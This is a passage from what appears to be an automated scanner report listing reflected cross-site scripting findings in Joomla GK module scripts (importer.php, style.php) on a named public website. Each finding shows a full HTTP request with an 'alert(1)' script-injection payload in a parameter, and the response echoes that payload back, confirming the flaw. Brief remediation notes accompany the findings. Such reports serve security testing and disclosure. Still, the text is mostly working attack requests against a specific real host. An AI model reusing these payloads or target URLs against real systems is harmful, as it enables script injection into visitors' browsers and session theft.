This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff5afe3"%3balert(1)//006abc4a1a3&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff5afe3";alert(1)//006abc4a1a3",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "in
...[SNIP]...

4.1420. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [clickable_slides parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the clickable_slides request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload debb1%3balert(1)//390cebd0cf3 was submitted in the clickable_slides parameter. This input was echoed as debb1;alert(1)//390cebd0cf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1debb1%3balert(1)//390cebd0cf3 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffff
...[SNIP]...
":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1debb1;alert(1)//390cebd0cf3,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1421. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the interface_x request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74487%3balert(1)//eed7b2c0841 was submitted in the interface_x parameter. This input was echoed as 74487;alert(1)//eed7b2c0841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-2074487%3balert(1)//eed7b2c0841&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-2074487;alert(1)//eed7b2c0841,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1422. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_y parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the interface_y request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83470%3balert(1)//8c079405adc was submitted in the interface_y parameter. This input was echoed as 83470;alert(1)//8c079405adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=083470%3balert(1)//8c079405adc&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffff
...[SNIP]...
y":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":083470;alert(1)//8c079405adc,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1423. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b6d"%3balert(1)//5a45291e6bc was submitted in the mid parameter. This input was echoed as e3b6d";alert(1)//5a45291e6bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1e3b6d"%3balert(1)//5a45291e6bc&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1e3b6d";alert(1)//5a45291e6bc"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail
...[SNIP]...

4.1424. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [text_block_opacity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the text_block_opacity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12cd9%3balert(1)//195831b8a90 was submitted in the text_block_opacity parameter. This input was echoed as 12cd9;alert(1)//195831b8a90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=012cd9%3balert(1)//195831b8a90&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":012cd9;alert(1)//195831b8a90,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   
...[SNIP]...

4.1425. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a678b%3balert(1)//9cf7ce79c61 was submitted in the thumbnail_border parameter. This input was echoed as a678b;alert(1)//9cf7ce79c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1a678b%3balert(1)//9cf7ce79c61&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1a678b;alert(1)//9cf7ce79c61,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p"
...[SNIP]...

4.1426. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border_color request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca19a"%3balert(1)//c1fee88792f was submitted in the thumbnail_border_color parameter. This input was echoed as ca19a";alert(1)//c1fee88792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21ca19a"%3balert(1)//c1fee88792f&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21ca19a";alert(1)//c1fee88792f",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1427. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color_inactive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border_color_inactive request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a1f1"%3balert(1)//90a46394978 was submitted in the thumbnail_border_color_inactive parameter. This input was echoed as 8a1f1";alert(1)//90a46394978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff8a1f1"%3balert(1)//90a46394978&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff8a1f1";alert(1)//90a46394978",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1428. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_margin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_margin request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97436%3balert(1)//8a6cc5501ee was submitted in the thumbnail_margin parameter. This input was echoed as 97436;alert(1)//8a6cc5501ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=597436%3balert(1)//8a6cc5501ee&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":597436;alert(1)//8a6cc5501ee,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false
...[SNIP]...

4.1429. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 232a2%3balert(1)//686be8d0403 was submitted in the thumbnail_width parameter. This input was echoed as 232a2;alert(1)//686be8d0403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66232a2%3balert(1)//686be8d0403&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66232a2;alert(1)//686be8d0403,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   
...[SNIP]...

4.1430. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [img_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the img_width request parameter is copied into the HTML document as plain text between tags. The payload e4ade<script>alert(1)</script>e6a9f213599 was submitted in the img_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=news_home_waters&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195pxe4ade<script>alert(1)</script>e6a9f213599&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


#news_home_waters a.readon_class{
   float: left;}

#news_home_waters h4.gk_news_show_news_header {
   margin: 0 0 8px;
   padding:0;
   text-align: left;}

#news_home_waters img.gk_news_show_news_image {
   display: block;float: left;}

#news_home_waters img.gk_news_show_news_image_static {
   display: block;float: left;width: 195pxe4ade<script>alert(1)</script>e6a9f213599;}

#news_home_waters a.gk_news_show_news_readmore {
}

#news_home_waters a.gk_news_show_news_readmore_inline {
   margin-left: 10px;
}

#news_home_waters p.gk_news_show_news_text {
   margin-top
...[SNIP]...

4.1431. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [modid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the modid request parameter is copied into the HTML document as plain text between tags. The payload 75723<script>alert(1)</script>13bc00b91d6 was submitted in the modid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=news_home_waters75723<script>alert(1)</script>13bc00b91d6&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195px&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


#news_home_waters75723<script>alert(1)</script>13bc00b91d6 a.readon_class{
   float: left;}

#news_home_waters75723<script>alert(1)</script>13bc00b91d6 h4.gk_news_show_news_header {
   margin: 0 0 8
...[SNIP]...
